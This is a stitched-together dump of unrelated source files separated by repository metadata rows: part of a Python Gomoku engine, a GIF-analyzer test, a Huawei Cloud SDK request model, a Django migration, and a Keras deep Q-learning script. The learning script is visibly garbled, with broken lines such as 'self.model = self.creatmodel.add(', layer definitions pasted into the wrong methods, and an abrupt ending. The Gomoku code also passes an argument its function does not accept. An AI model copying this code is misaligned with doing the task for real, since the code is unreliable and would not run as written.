if x >= 0 and y >= 0 and x < pp.width and y < pp.height:
if board[x][y] == player:
tmp += 1
else:
tmp = 0
else:
tmp = 0
if tmp == 5:
return True
# 西北-东南
tmp = 0
for y in range(max(y_last - 4, 0), min(pp.height, y_last + 5)):
x = x_last - (y - y_last)
if x >= 0 and y >= 0 and x < pp.width and y < pp.height:
if board[x][y] == player:
tmp += 1
else:
tmp = 0
else:
tmp = 0
if tmp == 5:
return True
return False
def findChessShape(board, direction, current_position, player, SpecialChess, if_setpoint=True):
i, j = current_position
opponent = 3 - player
deltx, delty = direction
# 均按一定次序 从左到右 / 从上到下 / 西南-东北 / 西北 - 东南
# for deltx, delty in [(1, 0), (0, 1), (1, 1), (1, -1)]:
# 大一统模型,搞起
chessShape = [player]
x = i
y = j
if deltx == 1:
for x in range(i + 1, min(i + 5, pp.width)):
y += delty
if y < 0 or y >= pp.height:
break
if board[x][y] == opponent:
break
if board[x][y] == 0 and chessShape[-1] == 0:
chessShape.append(0)
break
chessShape.append(board[x][y])
else:
for y in range(j + 1, min(j + 5, pp.height)):
if y < 0 or y >= pp.height:
break
if board[x][y] == opponent:
break
if board[x][y] == 0 and chessShape[-1] == 0:
chessShape.append(0)
break
chessShape.append(board[x][y])
x = i - deltx
y = j - delty
tmp = sum(chessShape)
if inBoundary(x, y) and board[x][y] == 0:
# 左侧无挡
if tmp == 4 * player:
if chessShape == [player, player, player, player, 0]:
SpecialChess['liveFour'] += 1
if if_setpoint:
SpecialChess['p4'].append((x, y))
else:
SpecialChess['pushFour'] += 1
if if_setpoint:
if len(chessShape) > 4:
SpecialChess['p4'].append((i + deltx * chessShape.index(0), j + delty * chessShape.index(0)))
else:
SpecialChess['p4'].append((x, y))
if tmp == 3 * player:
if len(chessShape) == 5:
if chessShape == [player, 0, player, 0, player]:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i + deltx, j + delty))
SpecialChess['s3'].append((i + 3 * deltx, j + 3 * delty))
else:
SpecialChess['liveThree'] += 1
if if_setpoint:
SpecialChess['l3'].append((x, y))
SpecialChess['l3'].append((i + deltx * chessShape.index(0), j + delty * chessShape.index(0)))
if chessShape[-2] == player:
SpecialChess['l3'].append((i + 4 * deltx, j + 4 * delty))
elif len(chessShape) == 4:
if chessShape == [player, player, player, 0]:
if inBoundary(i - 2 * deltx, j - 2 * delty) and board[i - 2 * deltx][j - 2 * delty] == 0:
SpecialChess['liveThree'] += 1
if if_setpoint:
SpecialChess['l3'].append((i - deltx, j - delty))
SpecialChess['l3'].append((i + 3 * deltx, j + 3 * delty))
else:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i - deltx, j - delty))
SpecialChess['s3'].append((i + 3 * deltx, j + 3 * delty))
else:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i - deltx, j - delty))
SpecialChess['s3'].append((i + chessShape.index(0) * deltx, j + chessShape.index(0) * delty))
elif len(chessShape) == 3 and inBoundary(i - 2 * deltx, j - 2 * delty) and board[i - 2 * deltx][
j - 2 * delty] == 0:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i - deltx, j - delty))
if tmp == 2 * player:
if len(chessShape) == 4:
if chessShape == [player, player, 0, 0]:
if inBoundary(i + 4 * deltx, j + 4 * delty) and board[i + 4 * deltx][j + 4 * delty] == player:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i + 2 * deltx, j + 2 * delty))
SpecialChess['s3'].append((i + 3 * deltx, j + 3 * delty))
elif inBoundary(i - 2 * deltx, j - 2 * delty) and board[i - 2 * deltx][j - 2 * delty] == 0:
SpecialChess['liveTwo'] += 1
if if_setpoint:
SpecialChess['l2'].append((i - deltx, j - delty))
if inBoundary(i + 4 * deltx, j + 4 * delty) and board[i + 4 * deltx][j + 4 * delty]:
SpecialChess['l2'].append((i + 2 * deltx, j + 2 * delty))
if inBoundary(i - 3 * deltx, j - 3 * delty) and board[i - 3 * deltx][j - 3 * delty] == 0:
SpecialChess['l2'].append((i - 2 * deltx, j - 2 * delty))
else:
SpecialChess['sleepTwo'] += 1 # some question
else:
SpecialChess['sleepTwo'] += 1
elif len(chessShape) == 5: # [1,0,1,0,0]
SpecialChess['liveTwo'] += 1
if if_setpoint:
SpecialChess['l2'].append((i + deltx, j + delty))
SpecialChess['l2'].append((i + 3 * deltx, j + 3 * delty))
if tmp == player and len(chessShape) == 3:
# maybe live three
# maybe live Two
x = i + 2 * deltx
y = j + 2 * delty
newshape = []
for _ in range(2):
x += deltx
y += delty
if inBoundary(x, y) and board[x][y] != opponent:
newshape.append(board[x][y])
else:
break
if newshape == [player, player]:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i + deltx, j + delty))
SpecialChess['s3'].append((i + 2 * deltx, j + 2 * delty))
elif newshape == [player, 0]:
SpecialChess['liveTwo'] += 1
if if_setpoint:
SpecialChess['l2'].append((i + deltx, j + delty))
SpecialChess['l2'].append((i + 2 * deltx, j + 2 * delty))
elif newshape == [player]:
SpecialChess['sleepTwo'] += 1
elif not inBoundary(x, y) or board[x][y] == opponent:
if tmp == 4 * player: # ??
if len(chessShape) == 5:
SpecialChess['pushFour'] += 1
if if_setpoint:
SpecialChess['p4'].append((i + chessShape.index(0) * deltx, j + chessShape.index(0) * delty))
if tmp == 3 * player:
if len(chessShape) == 5:
SpecialChess['sleepThree'] += 1
if if_setpoint:
SpecialChess['s3'].append((i + chessShape.index(0) * deltx, j + chessShape.index(0) * delty))
if chessShape == [player, 0, player, 0, player]:
SpecialChess['s3'].append((i + 3 * deltx, j + 3 * delty))
else:
SpecialChess['s3'].append((i + 4 * deltx, j + 4 * delty))
def get_specialcases(board, player, if_setpoint=False):
SpecialChess = {'renju': 0, 'liveFour': 0, 'pushFour': 0,
'liveThree': 0, 'sleepThree': 0, 'liveTwo': 0, 'sleepTwo': 0,
'p4': [], 'l3': [], 's3': [], 'l2': []}
for i in range(pp.width):
for j in range(pp.height):
if board[i][j] != player:
continue
for direction in [(1, 0), (0, 1), (1, 1), (1, -1)]:
findChessShape(board=board, direction=direction, player=player, current_position=(i, j),
SpecialChess=SpecialChess, if_setpoint=if_setpoint)
return SpecialChess
class FKTexplore:
'''
fast kill test
趁Ta病,要Ta命, 一鼓作气再而衰三而竭
'''
def __init__(self, board, threshold, player=1):
self.board = board
self.threshold = threshold # fast kill 搜索层数限制
self.player = player # 查一波我方杀棋
self.threatForopponent = [] # 对方可能应对措施 e.g. 冲四 / 堵我方一手
self.lastPosi = None
self.winChoicePosi = None # only win will be set
# zobrist 唯一标识
self.chessnum = chess2int(self.board)
# 记录已下过棋形
self.endfkt = {}
def fktvalue(self, depth, chesshape):
# 不成功便成仁
x, y = self.lastPosi
if if_win(board=self.board, player=self.player, x_last=x, y_last=y):
if self.player == 1:
return 1
else:
return 0
if depth < self.threshold:
depth += 1
else:
return 0
# continue to alpha - beta
if self.player == 1:
# player 2's turn
self.player = 3 - self.player
return self.fktmin(depth=depth, chesshape=chesshape)
else:
# player 1's turn
self.player = 3 - self.player
return self.fktmax(depth=depth, chesshape=chesshape)
def fktmin(self, depth, chesshape):
v = 1
successors = self.fktSuccessor()
if len(successors) == 0:
return 0
for new_posi in successors:
x, y = new_posi
self.board[x][y] = self.player # 2
self.lastPosi = (x, y)
chesshape ^= hashTableForP2[(x, y)]
if chesshape in self.endfkt:
v = self.endfkt[chesshape]
else:
v = min(v, self.fktvalue(depth, chesshape))
self.endfkt[chesshape] = v
# traceback
chesshape ^= hashTableForP2[(x, y)]
self.board[x][y] = 0
if v == 0: # player 1 没赢
global AlreadyKill
AlreadyKill = False
return v
return v
def fktmax(self, depth, chesshape):
# 该步为player1 ,我方落子
v = 0
successors = self.fktSuccessor()
if len(successors) == 0:
return 0 # 无棋可杀
for new_posi in successors: # player 1 的可能走法
x, y = new_posi
self.board[x][y] = self.player
self.lastPosi = (x, y)
chesshape ^= hashTableForP1[(x, y)]
if chesshape in self.endfkt:
v = self.endfkt[chesshape]
else:
v = max(v, self.fktvalue(depth=depth, chesshape=chesshape))
self.endfkt[chesshape] = v
# traceback
chesshape ^= hashTableForP1[(x, y)]
self.board[x][y] = 0
if v == 1:
# 杀棋
global AlreadyKill
AlreadyKill = True
recordWin[chesshape] = (x, y)
return v
return v
def fktSuccessor(self):
# 核心之核心 但拉倒了 rewrite
if self.player == 1:
# 找到 (活三、活四、冲四)威胁 / 阻止对手的 冲四 威胁
mykill = get_specialcases(self.board, self.player, if_setpoint=True, attacker=True)
mythreat = get_specialcases(self.board, 3 - self.player, if_setpoint=True, attacker=False)
if len(mykill['p4']) > 0:
return mykill['p4']
if len(mythreat['p4']) > 0:
return mythreat['p4'] # 阻止冲四
if len(mykill['l3']) > 0:
return mykill['l3'] # 成活四
if len(mythreat['l3']) > 0:
return mykill['s3']
else:
record = {}
for chesspoi in mykill['s3']:
if chesspoi in record:
record[chesspoi] += 5
else:
record[chesspoi] = 1
for chesspoi in mykill['l2']:
if chesspoi in record:
record[chesspoi] += 5
else:
record[chesspoi] = 1
successor = sorted(record.keys(), key=lambda x: record[x], reverse=True)
return successor
else:
# 找到 (活四、冲四) 威胁 / 阻止对手的 冲四、活三威胁
mykill = get_specialcases(self.board, self.player, if_setpoint=True, attacker=True)
mythreat = get_specialcases(self.board, 3 - self.player, if_setpoint=True, attacker=False)
if len(mykill['p4']) > 0:
return mykill['p4']
if len(mythreat['p4']) > 0:
return mythreat['p4'] # 阻止冲四
if len(mykill['l3']) > 0:
return mykill['l3'] # 成活四
return mythreat['l3']
def fktSolution(self):
'''
算出是否有杀棋
:return:
'''
player = self.player
chesshape = self.chessnum
successors = self.fktSuccessor() # ???
for posi in successors:
x, y = posi
self.board[x][y] = player
self.lastPosi = posi
chesshape ^= hashTableForP1[(x, y)]
v = self.fktvalue(depth=0, chesshape=chesshape)
self.endfkt[chesshape] = v
# traceback
chesshape ^= hashTableForP1[(x, y)]
self.board[x][y] = 0
if v == 1:
# 杀棋成功
global AlreadyKill
AlreadyKill = True
tmp = chess2int(self.board)
recordWin[tmp] = (x, y)
# 只起此作用
self.winChoicePosi = (x, y)
return
return
def get_successors(board, player):
# return 当前player的successor
mykill = get_specialcases(board, player, True)
if len(mykill['p4']) > 0:
return mykill['p4']
opponent = 3 - player
mythreat = get_specialcases(board, opponent, True)
if len(mythreat['p4']) > 0:
return mythreat['p4']
if len(mykill['l3']) > 0:
return mykill['l3']
if len(mythreat['l3']) > 0:
tmp = mythreat['l3']
tmp.extend(mykill['s3'])
return tmp
record = {}
for chesspoi in mykill['s3']:
if chesspoi in record:
record[chesspoi] += 5
else:
record[chesspoi] = 1
for chesspoi in mykill['l2']:
if chesspoi in record:
record[chesspoi] += 5
else:
record[chesspoi] = 1
for chesspoi in mythreat['s3']:
if chesspoi in record:
record[chesspoi] += 1
else:
record[chesspoi] = 1
for chesspoi in mythreat['l2']:
if chesspoi in record:
record[chesspoi] += 1
else:
record[chesspoi] = 1
if len(record) == 0:
return nearKsquares(2, board)
successor = [k for k, v in record.items() if v > 2]
if len(successor) > 0:
return successor
else:
tmp = nearKsquares(2, board)
weight = 0.9
for item in tmp:
if item not in record:
record[item] = weight
weight -= 0.1
successor = sorted(record.keys(), key=lambda x: record[x], reverse=True)
return successor
# 随机
# 小飞
def evaluate(board, player):
score = {'renju': 0, 'liveFour': 10000, 'pushFour': 2,
'liveThree': 2, 'sleepThree': 1.5, 'liveTwo': 1, 'sleepTwo': 0.2}
# score = {'renju': 10000,
# 'L4': 1000,
# 'S4': 4,
# 'L3': 4,
# 'S3': 2,
# 'L2': 2,
# 'S2': 1,
# 'D4': -2,
# 'D3': -2,
# 'D2': -2}
if player == 1:
# 我方刚下完最后一步,相同棋形,敌方占优,敌方有四连直接赢
chessSituation = get_specialcases(board, player=1)
chessSituation_opponent = get_specialcases(board, player=2)
allscore = 0
if chessSituation_opponent['liveFour'] + chessSituation_opponent['pushFour'] >= 1:
return -10000 # 我方直接gg
elif chessSituation_opponent['liveThree'] >= 1 and (
chessSituation['pushFour'] + chessSituation['liveFour'] == 0):
return -10000 # 我方同样直接gg
if chessSituation['liveThree'] > 1:
score['liveThree'] *= 10
if chessSituation['pushFour'] > 1:
score['pushFour'] *= 10
for item in score:
extra = 0.1 * score[item] * int(
(chessSituation[item] > 0) and (chessSituation[item] == chessSituation_opponent[item]))
allscore += score[item] * (chessSituation[item] - chessSituation_opponent[item]) - extra
return allscore
else:
# 此步是对方下完,我方先走,相同棋形,我方占优,我方四连直接赢
chessSituation = get_specialcases(board, player=1)
chessSituation_opponent = get_specialcases(board, player=2)
allscore = 0
if chessSituation['liveFour'] + chessSituation['pushFour'] >= 1:
return +10000 # 我方直接win
elif chessSituation['liveThree'] >= 1 and (
chessSituation_opponent['pushFour'] + chessSituation_opponent['liveFour'] == 0):
return +10000 # 我方同样直接win
if chessSituation_opponent['liveThree'] > 1:
score['liveThree'] *= 10
if chessSituation_opponent['pushFour'] > 1:
score['pushFour'] *= 10
for item in score:
extra = 0.1 * score[item] * int(
(chessSituation[item] > 0) and (chessSituation[item] == chessSituation_opponent[item]))
allscore += score[item] * (chessSituation[item] - chessSituation_opponent[item]) + extra
return allscore
def value(depth, player, board, position, alpha, beta):
x, y = position
if if_win(board=board, player=player, x_last=x, y_last=y):
if player == 1:
return 10000
else:
return -10000
if depth < THRESHOLD:
depth += 1
else:
return evaluate(board, player=player)
# test
if player == 1:
# player 2's turn
return min_value(depth=depth, player=2, board=board, position=position, alpha=alpha, beta=beta)
else:
# player 1's turn
return max_value(depth=depth, player=1, board=board, position=position, alpha=alpha, beta=beta)
def max_value(depth, player, board, position, alpha, beta):
# 该步为player1 ,我方落子
v = -math.inf
successors = get_successors(board, player=player)
for new_posi in successors: # player 1 的可能走法
x, y = new_posi
board[x][y] = player
v = max(v, value(depth=depth, player=1, board=board, position=new_posi, alpha=alpha, beta=beta))
# traceback
board[x][y] = 0
alpha = max(alpha, v)
if alpha >= beta:
return v
return v
def min_value(depth, player, board, position, alpha, beta):
# 该步为player2 ,对方轮次
v = math.inf
successors = get_successors(board, player=player)
for new_posi in successors:
x, y = new_posi
board[x][y] = player
v = min(v, value(depth, 2, board, new_posi, alpha, beta))
# traceback
board[x][y] = 0
beta = min(beta, v)
if alpha >= beta:
return v
return v
def brain_end():
pass
def brain_about():
pp.pipeOut(pp.infotext)
if DEBUG_EVAL:
import win32gui
def brain_eval(x, y):
# TODO check if it works as expected
wnd = win32gui.GetForegroundWindow()
dc = win32gui.GetDC(wnd)
rc = win32gui.GetClientRect(wnd)
c = str(board[x][y])
win32gui.ExtTextOut(dc, rc[2] - 15, 3, 0, None, c, ())
win32gui.ReleaseDC(wnd, dc)
######################################################################
# A possible way how to debug brains.
# To test it, just "uncomment" it (delete enclosing """)
######################################################################
# define a file for logging ...
# DEBUG_LOGFILE = "F:/Gomokuoutcome.log"
# # ...and clear it initially
# with open(DEBUG_LOGFILE, "w") as f:
# pass
# define a function for writing messages to the file
# def logDebug(msg):
# with open(DEBUG_LOGFILE, "a") as f:
# f.write(msg + "\n")
# f.flush()
# define a function to get exception traceback
# def logTraceBack():
# import traceback
# with open(DEBUG_LOGFILE, "a") as f:
# traceback.print_exc(file=f)
# f.flush()
# raise
# use logDebug wherever
# use try-except (with logTraceBack in except branch) to get exception info
# an example of problematic function
# def brain_turn():
# logDebug("some message 1")
# try:
# logDebug("some message 2")
# 1. / 0. # some code raising an exception
# logDebug("some message 3") # not logged, as it is after error
# except:
# logTraceBack()
######################################################################
# "overwrites" functions in pisqpipe module
pp.brain_init = brain_init
pp.brain_restart = brain_restart
pp.brain_my = brain_my
pp.brain_opponents = brain_opponents
pp.brain_block = brain_block
pp.brain_takeback = brain_takeback
pp.brain_turn = Mybrain_turn
pp.brain_end = brain_end
pp.brain_about = brain_about
if DEBUG_EVAL:
pp.brain_eval = brain_eval
def main():
pp.main()
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
549746b4c2e4c7057bd7732d19f58753950efb1d | 5a3c4b802ea7d5ce380c38415929ebaa8799eb06 | /tests/test_analyze_gifs.py | 700b9bad30c536d79dd4ab352c4a24dcff1e0a73 | [
"MIT"
] | permissive | get-wrecked/gifalyzer | fe18855c83b2b9e2188faef92b317fa81e913b4d | 0731d03766cfecf3fc6c64cc17022563da09b85b | refs/heads/master | 2022-04-10T10:57:35.602500 | 2019-06-10T22:32:04 | 2019-06-10T22:32:04 | 93,275,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | import os
import pytest
from gifalyzer import analyze_gif
def test_analyze_gifs_normal():
report = analyze_gif(get_sample('200x202-26-130-130-0.gif'))
assert report['dimensions'] == (200, 202)
assert report['frame_count'] == 26
assert report['frame_delay_ms'] == 130
assert report['last_frame_delay_ms'] == 130
assert report['loop'] == 0
def get_sample(sample_name):
sample_dir = os.path.join(os.path.dirname(__file__), 'samples')
return os.path.join(sample_dir, sample_name)
| [
"git@thusoy.com"
] | git@thusoy.com |
a51fd66e325e13d07571a0145b88b73ff676b50b | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-drs/huaweicloudsdkdrs/v3/model/update_database_object_req.py | 698caaaa0fef8649ba108b232f7219fc181dd69a | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,360 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateDatabaseObjectReq:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'job_id': 'str',
'selected': 'bool',
'sync_database': 'bool',
'job': 'list[DatabaseInfo]'
}
attribute_map = {
'job_id': 'job_id',
'selected': 'selected',
'sync_database': 'sync_database',
'job': 'job'
}
def __init__(self, job_id=None, selected=None, sync_database=None, job=None):
"""UpdateDatabaseObjectReq - a model defined in huaweicloud sdk"""
self._job_id = None
self._selected = None
self._sync_database = None
self._job = None
self.discriminator = None
self.job_id = job_id
if selected is not None:
self.selected = selected
if sync_database is not None:
self.sync_database = sync_database
if job is not None:
self.job = job
@property
def job_id(self):
"""Gets the job_id of this UpdateDatabaseObjectReq.
任务ID
:return: The job_id of this UpdateDatabaseObjectReq.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this UpdateDatabaseObjectReq.
任务ID
:param job_id: The job_id of this UpdateDatabaseObjectReq.
:type: str
"""
self._job_id = job_id
@property
def selected(self):
"""Gets the selected of this UpdateDatabaseObjectReq.
是否进行对象选择,是:自定义迁移对象,否:全部迁移,不填默认为否。
:return: The selected of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._selected
@selected.setter
def selected(self, selected):
"""Sets the selected of this UpdateDatabaseObjectReq.
是否进行对象选择,是:自定义迁移对象,否:全部迁移,不填默认为否。
:param selected: The selected of this UpdateDatabaseObjectReq.
:type: bool
"""
self._selected = selected
@property
def sync_database(self):
"""Gets the sync_database of this UpdateDatabaseObjectReq.
是否库级同步
:return: The sync_database of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._sync_database
@sync_database.setter
def sync_database(self, sync_database):
"""Sets the sync_database of this UpdateDatabaseObjectReq.
是否库级同步
:param sync_database: The sync_database of this UpdateDatabaseObjectReq.
:type: bool
"""
self._sync_database = sync_database
@property
def job(self):
"""Gets the job of this UpdateDatabaseObjectReq.
数据对象选择信息,selected为true时必填。
:return: The job of this UpdateDatabaseObjectReq.
:rtype: list[DatabaseInfo]
"""
return self._job
@job.setter
def job(self, job):
"""Sets the job of this UpdateDatabaseObjectReq.
数据对象选择信息,selected为true时必填。
:param job: The job of this UpdateDatabaseObjectReq.
:type: list[DatabaseInfo]
"""
self._job = job
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateDatabaseObjectReq):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
b666560c3dfc850b210b32f9e91c4eaeb335a8c9 | 717ee3e48eeffcfb23a39c3401fab97881e00fe2 | /imate/chats/migrations/0003_randomchat.py | ef1423fd9b992122ee63235ac39d6f4ab3acd987 | [] | no_license | cryptic-pr03/iMate | e40a76e792ec0cd5dd1f37175404feef0336c536 | 0a9764ef78d3772faf9299ae8c516b1b7c92504f | refs/heads/main | 2023-08-30T12:56:54.918083 | 2021-11-16T06:20:37 | 2021-11-16T06:20:37 | 418,390,421 | 0 | 1 | null | 2021-11-16T05:19:57 | 2021-10-18T07:27:03 | Python | UTF-8 | Python | false | false | 760 | py | # Generated by Django 3.2.9 on 2021-11-12 19:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
('chats', '0002_message_isread'),
]
operations = [
migrations.CreateModel(
name='RandomChat',
fields=[
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='randomChatData', serialize=False, to='auth.user')),
('isPaired', models.BooleanField(default=False)),
('RandomChatId', models.CharField(blank=True, max_length=10, null=True)),
],
),
]
| [
"73387559+iDeepverma@users.noreply.github.com"
] | 73387559+iDeepverma@users.noreply.github.com |
ae35cbada08ee521c9e85c146f2064540ce87c83 | fd3c67d988d31b8f1aecfb438a3b14b35d692066 | /Q Learning Sentdex/dqn.py | 5fbeff51e0cc18d3be1f5a34bcb1324930838170 | [] | no_license | iamycee/RL-Algorithms-Tensorflow | c16bf99059bb2369b07384ea16b4406410d141c7 | c9c6ac66e11b41fe79d0af1a04cd894cb85d6906 | refs/heads/master | 2020-05-22T16:01:21.176081 | 2019-07-04T12:33:49 | 2019-07-04T12:33:49 | 186,418,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,101 | py | from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten
from keras.callbacks import TensorBoard
from keras.optimizers import Adam
from collections import deque
import numpy as np
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
REPLAY_MEMORY_SIZE = 50_000
MIN_REPLAY_MEMORY_SIZE = 1_000
MODEL_NAME = '256x2'
DISCOUNT = 0.99
MINIBATCH_SIZE = 64
UPDATE_TARGET_EVERY = 5 #update after 5 episodes
MIN_REWARD = -200 # For model save
MEMORY_FRACTION = 0.20
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
class DQNAgent:
def __init__(self):
#main model .train every step
self.model = self.creatmodel.add(
Conv2D(256, (3, 3), input_shape=env.observation_space.n))
model.add(Activation('relu'))
model.add(MaxPooling2D(2, 2))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3), input_shape=env.observation_space.n))
model.add(Activation('relu'))
model.add(MaxPooling2D(2, 2))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3), input_shape=env.observation_space.n))
model.add(Activation('relu'))
model.add(MaxPooling2D(2, 2))
model.add(Dropout(0.2))
#.predict every step
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
self.replay_memory = deque(
maxLen=REPLAY_MEMORY_SIZE) #for batch training
def create_model(self):
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=env.observation_space.n))
model.add(Activation('relu'))
model.add(MaxPooling2D(2, 2))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(2, 2))
model.add(Dropout(0.2))
model.add(Flatten())
model.add(Dense(64))
model.add(Dense(env.action_space.n, activation='linear'))
model.compile(loss='mse',
optimizer=Adam(lr=0.001),
metrics=['accuracy'])
return modelmodel.add(
Conv2D(256, (3, 3), input_shape=env.observation_space.n))
model.add(Activation('relu'))
model.add(MaxPooling2D(2, 2))
model.add(Dropout(0.2))
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
def get_qs(self, state, step):
return self.model.predict(
np.array(state).reshape(-1, *state.shape) / 255)[0]
def train(self, terminal_state, step):
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return #only start training if a certain minimum number of samples has been reached
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
#Get current states from minibatch, then query NN model for Q values
current_states = np.array([transition[0]
for transition in minibatch]) / 255
current_qs_list = self.model.predict(current_states)
new_current_states = np.array(
[transition[3] for transition in minibatch]) / 255
future_qs_list = self.target_model.predict(new_current_states)
#Now let's update our model
X = []
y = []
for index, (current_state, action, reward, new_current_state,
done) in enumerate(minibatch):
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward #if done then future qs don't exist
#Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
X.append(current_state)
y.append(current_qs)
#Fit on all samples as one batch
self.model.fit(np.array(X) / 255,
np.array(y),
batch_size=MINIBATCH_SIZE,
verbose=0,
shuffle=False)
if terminal_state:
model.add(Conv2D(256, (3, 3), input_shape=env.observation_space.n))
model.add(Activation('relu'))
model.add(MaxPooling2D(2, 2))
model.add(Dropout(0.2))
self.target_update_counter += 1
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
class Blob:
def __init__(self, size):
self.size = size
self.x = np.random.randint(0, size)
self.y = np.random.randint(0, size)
def __str__(self):
return f"Blob ({self.x}, {self.y})"
def __sub__(self, other):
return (self.x - other.x, self.y - other.y)
def __eq__(self, other):
return self.x == other.x and self.y == other.y
def action(self, choice):
'''
Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
'''
if choice == 0:
self.move(x=1, y=1)
elif choice == 1:
self.move(x=-1, y=-1)
elif choice == 2:
self.move(x=-1, y=1)
elif choice == 3:
self.move(x=1, y=-1)
elif choice == 4:
self.move(x=1, y=0)
elif choice == 5:
self.move(x=-1, y=0)
elif choice == 6:
self.move(x=0, y=1)
elif choice == 7:
self.move(x=0, y=-1)
elif choice == 8:
self.move(x=0, y=0)
def move(self, x=False, y=False):
# If no value for x, move randomly
if not x:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# If no value for y, move randomly
if not y:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# If we are out of bounds, fix!
if self.x < 0:
self.x = 0
elif self.x > self.size - 1:
self.x = self.size - 1
if self.y < 0:
self.y = 0
elif self.y > self.size - 1:
self.y = self.size - 1
class BlobEnv:
SIZE = 10
RETURN_IMAGES = True
MOVE_PENALTY = 1
ENEMY_PENALTY = 300
FOOD_REWARD = 25
OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3) # 4
ACTION_SPACE_SIZE = 9
PLAYER_N = 1 # player key in dict
FOOD_N = 2 # food key in dict
ENEMY_N = 3 # enemy key in dict
# the dict! (colors)
d = {1: (255, 175, 0), 2: (0, 255, 0), 3: (0, 0, 255)}
def reset(self):
self.player = Blob(self.SIZE)
self.food = Blob(self.SIZE)
while self.food == self.player:
self.food = Blob(self.SIZE)
self.enemy = Blob(self.SIZE)
while self.enemy == self.player or self.enemy == self.food:
self.enemy = Blob(self.SIZE)
self.episode_step = 0
if self.RETURN_IMAGES:
observation = np.array(self.get_image())
else:
observation = (self.player - self.food) + (self.player -
self.enemy)
return observation
def step(self, action):
self.episode_step += 1
self.player.action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
if self.RETURN_IMAGES:
new_observation = np.array(self.get_image())
else:
new_observation = (self.player - self.food) + (self.player -
self.enemy)
if self.player == self.enemy:
reward = -self.ENEMY_PENALTY
elif self.player == self.food:
reward = self.FOOD_REWARD
else:
reward = -self.MOVE_PENALTY
done = False
if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
done = True
return new_observation, reward, done
def render(self):
img = self.get_image()
img = img.resize(
(300, 300)) # resizing so we can see our agent in all its glory.
